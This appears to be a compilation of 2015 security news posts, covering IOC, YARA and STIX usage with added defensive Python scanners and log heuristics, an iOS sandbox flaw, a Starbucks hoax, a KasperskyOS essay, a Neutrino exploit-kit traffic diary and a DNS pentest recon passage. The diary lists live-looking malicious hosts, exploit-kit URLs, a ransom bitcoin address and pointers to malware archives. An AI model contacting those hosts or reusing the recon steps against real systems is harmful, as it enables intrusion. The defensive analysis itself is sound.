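To make the two knowledge-base formats concrete, here is a minimal scanner, written for this page as an added example (it is not Loki's own code), that parses a hash-iocs style list (<hash>;<description>) and a filename-iocs style list (<regex>;<score>) and walks a directory with them. The sample directory, the "malicious" file and both IOC lists are constructed inside the demo function; the hash IOC is simply the MD5 of a constructed byte string, so no real malware hash is involved. The 60-point threshold for filename matches is an assumption of this example.

```python
"""Minimal IOC scanner in the spirit of the hash-iocs / filename-iocs
knowledge base described above.  Added example, not Loki's own code; the
file layouts assumed are "<hash>;<description>" and "<regex>;<score>",
with '#' starting a comment line in both files."""
import hashlib
import os
import re
import tempfile


def parse_hash_iocs(text):
    """Return {lowercase hex digest: description} from hash-iocs text."""
    iocs = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, description = line.partition(";")
        iocs[digest.strip().lower()] = description.strip()
    return iocs


def parse_filename_iocs(text):
    """Return [(compiled regex, score)] from filename-iocs text."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pattern, _, score = line.rpartition(";")
        rules.append((re.compile(pattern, re.IGNORECASE), int(score)))
    return rules


def file_digests(path):
    """MD5, SHA1 and SHA256 of one file, read in 64 KiB chunks."""
    hashers = [hashlib.md5(), hashlib.sha1(), hashlib.sha256()]
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            for h in hashers:
                h.update(chunk)
    return [h.hexdigest() for h in hashers]


def scan_directory(root, hash_iocs, filename_iocs, threshold=60):
    """Walk root; report (kind, path, detail) for hash hits and for paths
    whose summed filename-IOC score reaches the threshold."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            for digest in file_digests(path):
                if digest in hash_iocs:
                    findings.append(("hash", path, hash_iocs[digest]))
                    break
            score = sum(s for rx, s in filename_iocs if rx.search(path))
            if score >= threshold:
                findings.append(("filename", path, "score=%d" % score))
    return findings


def demo():
    """Build a constructed directory and IOC lists, then scan them.
    The 'malicious' file is just a text string; its MD5 is computed here
    so the demo needs no real malware hash."""
    root = tempfile.mkdtemp(prefix="iocdemo_")
    sample = b"constructed sample content"
    with open(os.path.join(root, "svchost.exe"), "wb") as fh:
        fh.write(sample)
    with open(os.path.join(root, "readme.txt"), "wb") as fh:
        fh.write(b"nothing to see")
    os.mkdir(os.path.join(root, "Temp"))
    with open(os.path.join(root, "Temp", "update.exe.tmp"), "wb") as fh:
        fh.write(b"benign content")

    hash_text = ("# constructed hash IOC, format <MD5>;<description>\n"
                 "%s;Demo component (constructed)\n" % hashlib.md5(sample).hexdigest())
    filename_text = ("# constructed filename IOCs, format REGEX;SCORE\n"
                     r"[\\/]Temp[\\/].*\.exe\.tmp$;70" "\n"
                     r"readme\.txt$;10" "\n")
    return scan_directory(root, parse_hash_iocs(hash_text),
                          parse_filename_iocs(filename_text))


if __name__ == "__main__":
    for kind, path, detail in demo():
        print(kind, path, detail)
```

The scoring model is what makes filename indicators usable: a single weak pattern (readme.txt, score 10) never fires on its own, whereas a path that matches a strong pattern (a dropped .exe.tmp under a Temp folder, score 70) is reported. A hash hit, by contrast, is reported unconditionally, which is why hash lists need the false-positive exclusions mentioned above.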
YARA rules
In addition to the various IOC indicators, there are files with the “.yar” extension attached to some reports. These files contain rules for YARA – a tool for identifying and categorizing malicious samples. The so-called YARA rules use a special syntax to describe attributes that indicate the presence of malicious activity in the system. If one of the rules is met, the analyzer returns an infection verdict that includes the relevant details (e.g., the threat’s name).
The Loki scanner described above also supports YARA rules, which means that administrators can use .yar files taken from reports to scan the system for the threats described in these reports. This is done by copying a .yar file to the “signature” folder and launching a scan.
However, the official tool created by developers of the YARA project is much better suited to working with YARA rules, because its knowledge base is regularly updated and is much more extensive than the databases of other similar utilities. As a result, scanning provides a more comprehensive view of an information system’s security, with more complete information on the presence of malicious components in the system.
To scan a workstation, it is sufficient to launch the YARA utility with the necessary parameters. For example:
yara32.exe -d md5=<MD5_hash> <this_is_yara_rule.yar> <dir_for_check>
where “-d” is a parameter used to define external variables. If any matches to any of the rules are detected, the utility will display a notification including the rule name and the component triggering the rule.
Sample notification of a YARA rule match
The administrator can, for example, launch such scans at system startup. This can be done by writing a simple PowerShell script that launches the utilities with the right parameters and, if necessary, scheduling it to run on all hosts at logon through an Active Directory Group Policy: User Configuration -> Windows Settings -> Scripts (Logon/Logoff) -> Logon.
STIX and JSON
Structured Threat Information Expression (STIX) is a unified language for recording threat information and importing it into software solutions. Many security solutions can import information in the STIX format (as well as JSON, which is described below) for using that information in the following kinds of infrastructure:
SIEM
Indicator-based security solutions (such as scanners)
Forensic platforms
Solutions of the Endpoint Security class, etc.
A STIX report can be imported into IBM QRadar, a popular SIEM solution, using a specially designed Python script:
./stix_import.py -f STIXDocument.xml -i 192.168.56.2 -t XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX -r MyReferenceSet
where the “-f” parameter defines the location of a local STIX document, “-i” defines a host with a QRadar console installed on it, and “-t” defines a service token for QRadar.
STIX reports are also supported by the Splunk App for Enterprise Security and can be imported into it. A STIX file must have an .xml extension to be read and parsed.
It is worth noting that there is a Python utility called openioc-to-stix which can be used to convert OpenIOC format to STIX Indicators, enabling indicators of compromise to be imported as STIX rules into solutions that do not support OpenIOC.
JSON is one of the most popular data presentation formats, which is also often used to format data provided with reports. The use of JSON data depends on the administrator’s needs and on the software solution into which the data is imported. For example, if a JSON file contains IP addresses of command servers to which infected workstations connect, the administrator of the infrastructure protected by the solution can include these IPs in the blacklist of a firewall supporting JSON imports. If the firewall does not support importing data in this format, the administrator can use a parser (a JSON file analyzer) to export the IP list from the file and then import it into the firewall’s blacklist.
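The last case in that paragraph, a firewall that cannot import JSON directly, is where a small parser earns its keep. The following Python script is an added example written for this page (not part of the original article or of any vendor tool). Because report JSON has no single agreed schema, it assumes an "indicators" list of objects with type, value and role fields; the sample report is constructed, and its two C2 addresses reuse values published in the Neutrino EK diary elsewhere on this page. The remaining entries are deliberately malformed, private, duplicated or of the wrong role, to show the filtering an administrator wants before anything reaches a perimeter blocklist.

```python
"""Pull command-and-control IP addresses out of a JSON threat report and
render them as firewall blocklist entries.  Added example; the report
layout (an "indicators" list of {type, value, role} objects) is an
assumption, since report JSON has no single agreed schema."""
import ipaddress
import json

# Constructed report.  The two C2 addresses reuse values from the Neutrino
# EK diary elsewhere on this page; the other entries are deliberate junk.
SAMPLE_REPORT = json.dumps({
    "campaign": "demo",
    "indicators": [
        {"type": "ipv4", "value": "185.44.105.7", "role": "c2"},
        {"type": "ipv4", "value": "172.246.241.236", "role": "c2"},
        {"type": "ipv4", "value": "10.0.0.5", "role": "c2"},           # private: skip
        {"type": "ipv4", "value": "not.an.ip", "role": "c2"},          # malformed: skip
        {"type": "domain", "value": "example.invalid", "role": "c2"},  # not an IP: skip
        {"type": "ipv4", "value": "185.44.105.7", "role": "c2"},       # duplicate
        {"type": "ipv4", "value": "10.1.2.3", "role": "victim"},       # wrong role: skip
    ],
})


def iter_dicts(node):
    """Yield every dict found anywhere in a nested JSON value, so the
    extraction does not depend on the exact nesting of the report."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from iter_dicts(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_dicts(value)


def extract_c2_ips(report_text, role="c2"):
    """Return sorted, de-duplicated, globally routable C2 IPs as strings.
    Private/reserved addresses are dropped so that an infected internal
    host listed in a report never ends up on the perimeter blocklist."""
    found = set()
    for entry in iter_dicts(json.loads(report_text)):
        if entry.get("role") != role or entry.get("type") not in ("ipv4", "ipv6"):
            continue
        try:
            ip = ipaddress.ip_address(str(entry.get("value", "")).strip())
        except ValueError:
            continue  # malformed value: worth logging in production, skipped here
        if ip.is_global:
            found.add(ip)
    # IPv4 and IPv6 objects are not mutually comparable, so key on version first.
    return [str(ip) for ip in sorted(found, key=lambda a: (a.version, a))]


def render_blocklist(ips, fmt="plain"):
    """Format entries for import: one IP per line, or iptables commands."""
    if fmt == "iptables":
        return ["iptables -I INPUT -s %s -j DROP" % ip for ip in ips]
    return list(ips)


if __name__ == "__main__":
    for line in render_blocklist(extract_c2_ips(SAMPLE_REPORT), "iptables"):
        print(line)
```

The is_global check is the important design choice: reports sometimes list infected victim hosts or lab addresses next to real infrastructure, and a blocklist built without that filter can cut off internal services.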
Conclusion
“Indicators of compromise” help to use threat data effectively: identify malware and quickly respond to incidents. These indicators are very often included in threat reports, which are often skimmed by readers. Even if a document providing details of a research project does not have a dedicated Indicators of Compromise section, a reader can always extract useful data (information on the attributes found in infected systems) from the text, present the data extracted in any of the formats described above and import it into a security solution.
Details Surface on Patched Sandbox Violation Vulnerability in iOS
21.8.2015
Apple patched an issue last week in iOS that could have allowed attackers to bypass the third-party app-sandbox protection mechanism on devices and read arbitrary managed preferences via a special app. The issue, which was present in versions of iOS prior to 8.4.1, stems from a vulnerability in both the sandbox_profiles and CFPreferences components of the operating system. Both are used when storing and retrieving preference keys and values on Apple devices.
According to two CVEs filed for the vulnerability, Andreas Weinlein, a researcher with the security firm Appthority, discovered the issue, nicknamed Quicksand, and reported it to Apple. The vulnerability affected devices that had mobile device management (MDM) software installed on them. MDM software is primarily used by IT departments to monitor and manage data, email and apps across multiple devices. Appthority warns, however, that when certain files, managed app configuration files, are pushed to devices via MDM, a sandbox violation can occur. Assuming an attacker can wedge a line of code into running processes, they could read a world-readable directory on the phone, /Library/Managed Preferences/mobile/, and access sensitive app configuration and settings information.
To carry out the attack, an attacker would have to get the target to download a specialized app. “Once the app gets downloaded and installed on the devices, it would continuously monitor the directory for configuration settings being written to the world readable directory, harvesting and sending them to the attacker,” a blog entry published Wednesday about the vulnerability reads. Appthority claims it has reached out to several MDM companies to tip them off about the vulnerability, and maintains that once an attacker gleans information such as credentials or details about the company’s managed device infrastructure, it could use those to access the services themselves.
The firm goes on to caution in its blog that, following a quick scan of apps “residing on enterprise managed devices”, it found that nearly half of them (47 percent) discussed credentials, usernames, passwords and authentication, and that more than half (67 percent) referenced server identification information, statistics that suggest that no amount of sandboxing can prevent poorly kept data from being hacked. According to the security notes on iOS 8.4.1, which was pushed out last week, Apple addressed the issue by improving the third-party sandbox profile. It was one of several bugs the Cupertino giant patched, along with fixes for Content Security Policy, WebKit, and cookie leakage.
You’re Paying for Your Starbucks, One Way or the Other
21.8.2015
Today, I received this message from a friend living in Mexico via Whatsapp.
According to the message, Starbucks is giving away 500 in local currency credits if you take their survey, so my friend asked me to take a quick look to determine if it’s real.
Sadly for the coffee lovers among us, this is a classic hoax campaign abusing the Starbucks brand. If the victim follows the link from a mobile device, it loads a fake Starbucks survey with some scripts designed to customize the campaign according to the city of origin and its local currency.
So if you live in the U.S. you’re promised $500 USD but if you’re in Argentina then it’s only 500 pesos and so on. Argentinians are clearly getting the worse end of that deal.
If you have the patience to click through the survey, the scammers have the gall to ask you to spread the message to 10 of your contacts in order to redeem your imaginary voucher. This is how this hoax is spread: by enlisting the help of gullible victims to prey on their friends!
What if the victim uses a desktop browser? There is a script on the aforementioned site, which is actually located in Moldova, that detects the browser’s user agent. If it matches with a desktop version, the script redirects the visitor to the following URL:
hxxp://dpgoo.[***].com/258769f2-6910-4d0b-9db1-4d386c60c9d7
That URL in turn redirects visitors to another website for a Fake (Rogue) Technical Support service meant to scare the victim into providing remote access to their system.
It turns out that Google Hangouts calls to that number are prohibited. My first calling attempt met an automated answer of ‘This number is not in service’. However, on a second attempt with an alternate line I was able to connect to somebody with a foreign accent.
If you’re so inclined, you can listen to just how nice and attentive the ‘support staff’ is. Note the pauses and emotional inflection behind each scripted scene like ‘My name is…’ and when I revealed that my computer is infected: https://clyp.it/v2gjp3jq
As you can see, this is an all-around ‘Hoax-Fraud-Rogue’ scheme with redundancies and a low chance of failure. Victims themselves are enlisted to rekindle the campaign’s flames by spreading the message to 10 new users. So, first things first, it’s very important to break the cycle: stop bombarding your friends with scams! Next, invite them to have a conversation about how hoaxes work, maybe over a cup of coffee you’ll actually have to pay for.
The rise of artificial intelligence technologies
20.8.2015
The advance of artificial intelligence (AI) technologies has caught the attention of companies and institutions in a wide range of enterprise markets, and executives in almost every industry are considering the potential impact AI will have on their operations, business models, and bottom lines.
AI technologies being evaluated and deployed are diverse, yet interrelated, and include areas like cognitive computing, machine learning, deep learning, predictive APIs, natural language processing, image recognition, and speech recognition.
A recent report from Tractica forecasts that, as enterprise AI deployments gather increasing momentum, cumulative revenue for the sector will total $43.5 billion worldwide during the period from 2015 through 2024. The market intelligence firm forecasts that the largest application markets for AI will be advertising and media, financial services, manufacturing, oil and gas, and retail.
All of these industries work with complex systems and large data sets where companies are finding strong ROI by deploying AI technologies.
“In almost every industry, including some very traditional ones, new approaches to age-old problems are being trialed using artificial intelligence,” says principal analyst Bruce Daley. “The business questions being addressed range from where to plant crops to how to detect fraud. The most highly affected industries are likely to be those with large amounts of data, where there are high rewards for making decisions quickly.”
Daley adds that such deployments are not always high-profile or visible on the surface – oftentimes, AI capabilities are embedded deeply in enterprise software systems and operational processes. In addition, Daley’s analysis indicates that many traditional businesses are likely to be disrupted by practical applications of AI. “One needs to look no further than the automotive industry to see how AI technology like Google’s self-driving cars has forced every serious player in the industry worldwide to consider strategies for including AI in their products.”
What is a secure OS?
20.8.2015
After the publication of our article on car hacking we received a number of questions regarding KasperskyOS. People who wrote to us made the valid point that there are several good and reliable operating systems on the market, designed, among other purposes, for the automotive industry. The main argument used to demonstrate the technological superiority of competing solutions was that the principle of security domain isolation is not a new idea and many of the existing systems that are currently in use have numerous additional security features based on the current needs, such as implementations of cryptographic protocols, network filters and protection against network attacks. Some of these systems are even certified to meet various security standards!
All these additional features (including certification) are of course important, but is it this functionality that makes an operating system reliable and secure? To answer this question, we first need to answer another: what is a secure OS? From our viewpoint, a secure operating system should guarantee secure or trusted execution of components that are not secure (programs).
Our concept has two very important aspects. One is obvious: we do not trust third-party software and consider it insecure and unreliable by definition. The other, not-so-obvious aspect: we should trust the operating system and regard kernel functionality as trusted. To increase the level of trust (after all, gentlemen do not always believe each other’s word), the kernel should undergo formal and mathematical verification (the subject of verification would merit a large research paper of its own).
Taking this paradigm as a starting point, we did not just implement a secure architecture based on a trusted kernel, but learned from existing secure OS implementations, as well. The fundamental principles, such as security domain separation and a microkernel are only half the story. Studying other systems and their limitations helps not only to avoid known problems but also to find new ways to implement security properties. As a result, we have developed an OS that, on the one hand, is similar in its operating principles to other operating systems but, on the other hand, has features which help to overcome known limitations and improve the security characteristics of the system on which the OS is running.
As an example of such improvement, I would like to mention interprocess communication (IPC) typification. This technology, the idea of which might seem quite obvious, provides us with low-level control of the data sent in application calls, giving security policies a granularity of control that has never been implemented at this level. Another feature is combining different types of security policies, such as Flow Control and Type Enforcement, in one system. The resulting policy is a mix of stateful and stateless policies, offering the best of both worlds. Naturally, the possibilities of combining policies are not limited to these two types. No commercial operating system can boast this flexibility. This functionality provides tight control of all interprocess communication, which is based not only on the knowledge of the subject and object of communication (who requests and from whom) but also on the knowledge of the high-level context of communication (what is requested, when and what data is transferred).
Other KasperskyOS features include a flexible language for defining security policies and a policy verification system, which makes both creating and debugging policies significantly easier. There are many other things, as well. The uniqueness of our work is supported by US and Russian patents.
As a result, we believe we have developed an operating system which implements the principle of trusted execution of untrusted applications. This was achieved, among other things, by using the principle of security domain separation and control of interprocess communication that is tight and flexible at the same time. This means that in the OS, modules can only interact by following a strictly defined protocol, enabling them to call only allowed functions in a strictly defined sequence. For customers, this means that even if there is a vulnerability in some module that can be exploited by a hacker (and we admit that this may be the case), the OS works in such a way that the hacker will only be able to gain control of the vulnerable module and will not be able to interfere with the operation of other modules, because all communications are controlled.
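The property described above (a module may call only allowed functions, with correctly typed data, in a strictly defined sequence) can be modelled in a few dozen lines. The reference monitor below is an added example written for this page to illustrate the principle; it is not KasperskyOS code, and the domains ("app", "storage", "net"), interface methods and protocol are hypothetical. It combines a stateless Type Enforcement table (which methods may ever cross a given subject/object boundary), IPC typification (the declared argument types of each call) and a stateful protocol check (a per-session state machine), and the scenario shows a possibly compromised "app" module being stopped at each of the three layers without affecting the other modules.

```python
"""Toy reference monitor combining a stateless Type Enforcement table, typed
IPC and a stateful call-sequence protocol.  Added example modelling the
idea described above; not KasperskyOS code.  All domains, methods and
states are hypothetical."""
from dataclasses import dataclass, field

# Stateless part: which methods each (subject domain, object domain) pair may
# call at all, regardless of history.
TYPE_ENFORCEMENT = {
    ("app", "storage"): {"open", "read", "close"},
    ("app", "net"): {"send"},
}

# IPC typification: the declared argument types of every interface method.
INTERFACES = {
    "storage": {"open": (str,), "read": (int,), "close": ()},
    "net": {"send": (bytes,)},
}

# Stateful part: the protocol each object domain expects, as a state machine
# keyed by (current state, method) -> next state.  "net" has no protocol.
PROTOCOLS = {
    "storage": {
        ("idle", "open"): "opened",
        ("opened", "read"): "opened",
        ("opened", "close"): "idle",
    },
}


@dataclass
class ReferenceMonitor:
    te: dict
    interfaces: dict
    protocols: dict
    sessions: dict = field(default_factory=dict)  # (subject, object) -> state

    def check(self, subject, obj, method, args):
        """Return (allowed, reason); the session state advances only on allow."""
        # 1. Stateless: is this method ever permitted across this boundary?
        if method not in self.te.get((subject, obj), set()):
            return False, "type enforcement: %s may not call %s.%s" % (subject, obj, method)
        # 2. Typed IPC: does the payload have the declared shape for this call?
        expected = self.interfaces.get(obj, {}).get(method)
        if expected is None or len(args) != len(expected) or \
                not all(isinstance(a, t) for a, t in zip(args, expected)):
            return False, "typed IPC: bad argument types for %s.%s" % (obj, method)
        # 3. Stateful: is the call allowed given the session's current state?
        protocol = self.protocols.get(obj)
        if protocol is not None:
            state = self.sessions.get((subject, obj), "idle")
            next_state = protocol.get((state, method))
            if next_state is None:
                return False, "protocol: %s.%s not allowed in state %s" % (obj, method, state)
            self.sessions[(subject, obj)] = next_state
        return True, "allowed"


def run_scenario():
    """Constructed sequence of IPC calls from a (possibly compromised) app.
    Returns the list of allow/deny decisions in call order."""
    monitor = ReferenceMonitor(TYPE_ENFORCEMENT, INTERFACES, PROTOCOLS)
    calls = [
        ("app", "storage", "read", (16,)),        # read before open: protocol violation
        ("app", "storage", "open", ("/cfg",)),    # allowed, session -> opened
        ("app", "storage", "read", (16,)),        # allowed
        ("app", "storage", "write", (b"x",)),     # never granted: type enforcement
        ("app", "net", "send", ("text",)),        # str instead of bytes: typed IPC
        ("app", "storage", "close", ()),          # allowed, session -> idle
        ("app", "net", "send", (b"ok",)),         # allowed, no protocol for net
    ]
    return [monitor.check(*call)[0] for call in calls]


if __name__ == "__main__":
    print(run_scenario())
```

Note that a denied call never changes the session state, so a module that probes for a gap in the protocol learns nothing and gains no new rights; that is the behaviour the text describes when it says a compromised module can only control itself.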
An operating system can be compared to a shield. All additional built-in security capabilities, including firewalls, secure data transfer protocols, even certification, are rivets on the shield. They certainly add reliability to the whole thing, but they do not define the overall level of protection. What is more important is the architecture, the principles underlying the OS. This determines whether the shield will be made of paper, plywood or steel. Many operating systems have great rivets – but what kind of shield are they attached to?
Actor using Angler exploit kit switched to Neutrino
20.8.2015
Introduction
I've often had a hard time finding compromised websites to kick off an infection chain for the Neutrino exploit kit (EK). During the past few months, we've usually seen Angler EK, Nuclear EK, or Rig EK instead. But the situation changed by Wednesday 2015-08-19. Earlier this week, we stopped finding as much Angler EK and started seeing a lot more traffic for Neutrino.
Our preliminary analysis indicates the actor behind a significant amount of Angler EK during recent months switched to Neutrino EK sometime this week. We don't have enough data to know if this change is permanent.
This diary presents our preliminary analysis, and it looks at current URL patterns for Neutrino EK. In this analysis, we examine changes in two infection chains kicked off by the same compromised website. The same site that led to Angler EK last week is now causing Neutrino EK.
Preliminary results
The first traffic example from Thursday 2015-08-13 has Angler EK. The second example from the same compromised website on Wednesday 2015-08-19 has Neutrino EK.
Similarities in the traffic indicate these were caused by the same actor. In this comparison, two notable similarities were found:
1) Pages from this compromised website had the same injected code, but the iframe changed from an Angler EK landing URL to Neutrino EK.
2) Each time, the payload was CryptoWall 3.0 using 1LY58fiaAYFKgev67TN1UJtRveJh81D2dU as the bitcoin address for ransom payment.
I noticed this in a few other compromised websites that led to Angler EK traffic last week. Most of them pointed to Neutrino when I checked within the past 24 hours.
Details
We used a compromised website named actionasia.com for this comparison.
EK traffic normally requires a referrer, and Google did not let us get to actionasia.com from its search results. I had to get at the compromised website from a Bing search. If Bing gives you a warning, it also gives you the option to proceed to the compromised site. Google will not.
On Thursday 2015-08-13, this website had injected code with an iframe leading to Angler EK [1]. Six days later on Wednesday 2015-08-19, this website showed the same pattern of injected code, but the iframe pointed to a URL for Neutrino EK. See the below images for comparison.
Shown above: Injected script with an iframe pointing to an Angler EK landing page.
Shown above: Same style of injected script 6 days later, this time pointing to Neutrino EK.
Post infection traffic in both cases reveals a CryptoWall 3.0 infection. When checking the decrypt instructions for the ransom payment, the more recent CryptoWall 3.0 sample from Neutrino EK used the same bitcoin address as the Angler EK payload on 2015-08-13. This is the same bitcoin address used by several CryptoWall 3.0 samples from Angler EK going back as early as 2015-07-01 [2].
Shown above: Bitcoin address from the CryptoWall 3.0 decrypt instructions on 2015-08-19 after the Neutrino EK infection.
Neutrino EK traffic
Infection traffic from Wednesday 2015-08-19 shows Neutrino EK on 185.44.105.7 over TCP port 3712. Current URL patterns for Neutrino EK have evolved somewhat since it reappeared in December 2014 after a hiatus of several months [3]. These changes in Neutrino are relatively recent. The EK's URLs are generally shorter than last month, and they show different patterns.
People have asked me why Neutrino EK uses a non-standard TCP port for its HTTP traffic. I can only guess it's an attempt to avoid detection.
Shown above: Wireshark filtered to show URL patterns for Neutrino EK from the 2015-08-19 infection.
Below are images from the TCP streams for Neutrino EK on Wednesday 2015-08-19:
Shown above: Neutrino EK landing page.
Shown above: Neutrino EK sends a Flash exploit.
Shown above: Neutrino EK sends the malware payload, a CryptoWall 3.0 executable (encrypted).
A link to the Hybrid-Analysis.com report for the decrypted payload (CryptoWall 3.0) is here. Below is a list of domains and HTTP requests from the pcap related to Neutrino EK sending CryptoWall 3.0:
Associated domains:
actionasia.com - Compromised website
185.44.105.7 port 3712 - obvpd.mohgroup.xyz:3712 - Neutrino EK
ip-addr.es - address check by CryptoWall 3.0 (not inherently malicious)
172.246.241.236 port 80 - grizzlysts.com - CryptoWall 3.0 callback traffic
46.108.156.176 port 80 - 6i3cb6owitcouepv.spatopayforwin.com - User checking the decrypt instructions
Traffic:
2015-08-19 16:40:07 UTC - actionasia.com - GET /
2015-08-19 16:40:13 UTC - obvpd.mohgroup.xyz:3712 - GET /bleed/fasten-22739002
2015-08-19 16:40:13 UTC - obvpd.mohgroup.xyz:3712 - GET /1998/06/02/audience/abandon/debate/hiss-happy-shore-enemy.html
2015-08-19 16:40:15 UTC - obvpd.mohgroup.xyz:3712 - GET /observation/d2V0cGNsaGtuYw
2015-08-19 16:40:18 UTC - obvpd.mohgroup.xyz:3712 - GET /dale/aHB0a2Vj
2015-08-19 16:40:22 UTC - ip-addr.es - GET /
2015-08-19 16:40:25 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?x=nyg80cl4x4
2015-08-19 16:40:27 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?z=7gh5okukgq5qtw
2015-08-19 16:40:31 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?t=d8limjgdeqca
2015-08-19 16:40:40 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?u=5cbq0udpvsjx
2015-08-19 16:40:45 UTC - 6i3cb6owitcouepv.spatopayforwin.com - GET /[random string]
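Two traits visible in that request list are cheap to check for in proxy or HTTP logs: HTTP served on a non-standard TCP port (the Neutrino EK trait the diary remarks on) and a rapid burst of POSTs to one PHP script with a different single-letter query key each time (the CryptoWall 3.0 callback shape). The Python below is an added example for this page, not the diary author's code; it parses lines in the exact format printed in the Traffic list above (the sample lines are copied from it) and reports both patterns. The 60-second window, the three-POST minimum and the set of "standard" web ports are assumptions of the example.

```python
"""Heuristic checks over the request log printed in the diary: HTTP on a
non-standard port and a burst of POSTs to one script with distinct query
keys.  Added example, not the diary's code; the line format is the one the
diary's Traffic list uses."""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) UTC - ([^\s:]+)(?::(\d+))? - (GET|POST) (.+)$")

# Sample lines copied from the diary's Traffic list above.
SAMPLE_LOG = """\
2015-08-19 16:40:07 UTC - actionasia.com - GET /
2015-08-19 16:40:13 UTC - obvpd.mohgroup.xyz:3712 - GET /bleed/fasten-22739002
2015-08-19 16:40:13 UTC - obvpd.mohgroup.xyz:3712 - GET /1998/06/02/audience/abandon/debate/hiss-happy-shore-enemy.html
2015-08-19 16:40:15 UTC - obvpd.mohgroup.xyz:3712 - GET /observation/d2V0cGNsaGtuYw
2015-08-19 16:40:18 UTC - obvpd.mohgroup.xyz:3712 - GET /dale/aHB0a2Vj
2015-08-19 16:40:22 UTC - ip-addr.es - GET /
2015-08-19 16:40:25 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?x=nyg80cl4x4
2015-08-19 16:40:27 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?z=7gh5okukgq5qtw
2015-08-19 16:40:31 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?t=d8limjgdeqca
2015-08-19 16:40:40 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?u=5cbq0udpvsjx
2015-08-19 16:40:45 UTC - 6i3cb6owitcouepv.spatopayforwin.com - GET /[random string]
"""

STANDARD_PORTS = (80, 443, 8080)  # assumption: what "normal" web traffic uses here


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, host, port, method, path = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "host": host,
            "port": int(port) if port else 80, "method": method, "path": path}


def find_suspicious(lines, window_seconds=60, min_posts=3):
    """Return (kind, host, detail) findings for the two heuristics."""
    reqs = [r for r in map(parse_line, lines) if r]
    findings, seen_ports = [], set()

    # Heuristic 1: plain HTTP to a host:port that is not a usual web port.
    for r in reqs:
        key = (r["host"], r["port"])
        if r["port"] not in STANDARD_PORTS and key not in seen_ports:
            seen_ports.add(key)
            findings.append(("nonstandard-port", r["host"], "HTTP on TCP %d" % r["port"]))

    # Heuristic 2: >= min_posts POSTs to the same script inside the window,
    # each carrying a different query-string key (callback/beacon shape).
    posts = defaultdict(list)
    for r in reqs:
        if r["method"] == "POST":
            posts[(r["host"], r["path"].partition("?")[0])].append(r)
    for (host, script), group in posts.items():
        span = (group[-1]["ts"] - group[0]["ts"]).total_seconds()
        keys = {g["path"].partition("?")[2].partition("=")[0] for g in group}
        if len(group) >= min_posts and span <= window_seconds and len(keys) == len(group):
            findings.append(("post-beacon", host, "%d POSTs to %s in %.0fs, query keys %s"
                             % (len(group), script, span, ",".join(sorted(keys)))))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG.splitlines()):
        print(*finding)
```

Neither heuristic is a signature: legitimate software also talks HTTP on odd ports and some web apps POST in bursts. They are triage filters that surface a handful of hosts from a day of proxy logs for an analyst to compare against the IDS alerts discussed next.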
Snort-based alerts on the traffic
I tried reading the pcap with the latest version of Snort (2.9.7.5) on a Debian 7 host using the snort registered rule set. The subscriber rule set is more up-to-date, but the registered rule set is free. Make sure to use pulledpork for keeping your rules up-to-date. My results show alerts for CryptoWall during the post-infection traffic, and we also find an alert incorrectly identifying one of the EK URLs as Sweet Orange. See the images below for details.
I also played back the pcap on Security Onion using Suricata and the EmergingThreats (ET) open rule set. Like the snort registered rule set, the ET open rule set is free. Remember to run sudo /usr/bin/rule-update to make sure your rules are up-to-date. The results show alerts for Neutrino EK using signatures from earlier this month. We also find alerts for CryptoWall 3.0. See the images below for details.
Final words
If this change indicates a trend, we might see a large amount of compromised websites pointing to Neutrino EK, along with a corresponding drop in Angler EK traffic. However, criminal groups using these EKs have quickly changed tactics in the past, and the situation may change by the time you read this. We will continue to monitor the threat landscape and let the community know of any significant changes.
Traffic and malware from the analysis are listed below:
Pcap and malware from the Thursday 2015-08-13 Angler EK infection is available here.
A pcap of the Neutrino EK traffic from Wednesday 2015-08-19 is available here.
A zip archive containing the Neutrino EK flash exploit and malware payload (CryptoWall 3.0) is available here.
The zip archive is password-protected with the standard password. If you don't know it, email admin@malware-traffic-analysis.net and ask.
---
Brad Duncan
Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://malware-traffic-analysis.net/2015/08/13/index.html
[2] https://isc.sans.edu/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863/
[3] https://isc.sans.edu/diary/Exploit+Kit+Evolution+Neutrino/19283
Outsourcing critical infrastructure (such as DNS)
19.8.2015
Migrating everything to the “cloud” or to various online services has become increasingly popular in the last couple of years (and will probably not stop). However, leaving our most valuable jewels with someone else makes a lot of security people (me included) nervous.
During some of the latest external penetration tests I noticed an increasing trend of companies moving some of their services to various cloud solutions or to their providers.
When performing the reconnaissance phase of a penetration test, a very important part is to try to map the target assets/network as much as possible. Of course, DNS is one of the most important services, which must be available publicly and which sometimes gets misconfigured (how many times have you seen DNS information about internal assets that gets published on the Internet).
So, a simple dig query will tell us what the DNS servers for our target client are:
$ dig ns target.com
;; QUESTION SECTION:
;target.com. IN NS
;; ANSWER SECTION:
target.com. 1365 IN NS zion.target.com.
target.com. 1365 IN NS morpheus.target.com.
;; ADDITIONAL SECTION:
zion.target.com. 1366 IN A 212.71.248.24
morpheus.target.com. 9018 IN A 88.198.75.37
Now what do we have here? Things look generally OK – there are two DNS servers for our target domain, at two different hosting companies (or, for the sake of this article, we can pretend that they are at the target company’s ISP).
